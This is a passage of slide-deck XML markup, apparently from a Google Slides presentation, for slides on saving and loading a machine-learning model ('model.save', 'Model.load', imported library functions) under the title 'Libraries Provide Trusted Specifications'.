                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model.load(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>‘model.bin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.predict(input)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Google Shape;616;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351301"/>
            <a:ext cx="841200" cy="808800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="25475">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="122200" lIns="122200" spcFirstLastPara="1" rIns="122200" wrap="square" tIns="122200">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1871"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="617" name="Google Shape;617;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351300"/>
            <a:ext cx="840977" cy="808511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="618" name="Google Shape;618;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2719361" y="3607802"/>
            <a:ext cx="840965" cy="784798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="619" name="Google Shape;619;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="963300"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Saver</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="Google Shape;620;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5412875" y="953595"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Loader</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="621" name="Google Shape;621;p54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993550" y="2879550"/>
            <a:ext cx="646200" cy="402300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="622" name="Google Shape;622;p54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3445200" y="2562150"/>
            <a:ext cx="1999200" cy="719700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxn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6" name="Shape 626"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Google Shape;627;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3711800" y="3226200"/>
            <a:ext cx="3188100" cy="1166400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en" sz="1200">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Imports:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.Model</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>torch.Tensor</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.read_weights_from_file</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.SGD</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Google Shape;628;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insight: Libraries Provide Trusted Specifications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Google Shape;629;p55"/>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630" name="Google Shape;630;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="1332600"/>
            <a:ext cx="3427500" cy="1477500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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rgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>train(model, corpus)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.save(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>‘model.bin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Google Shape;631;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394500" y="1332600"/>
            <a:ext cx="3649500" cy="1046700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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rgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model.load(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>‘model.bin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.predict(input)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Google Shape;632;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351301"/>
            <a:ext cx="841200" cy="808800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="25475">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="122200" lIns="122200" spcFirstLastPara="1" rIns="122200" wrap="square" tIns="122200">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1871"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="633" name="Google Shape;633;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351300"/>
            <a:ext cx="840977" cy="808511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="634" name="Google Shape;634;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
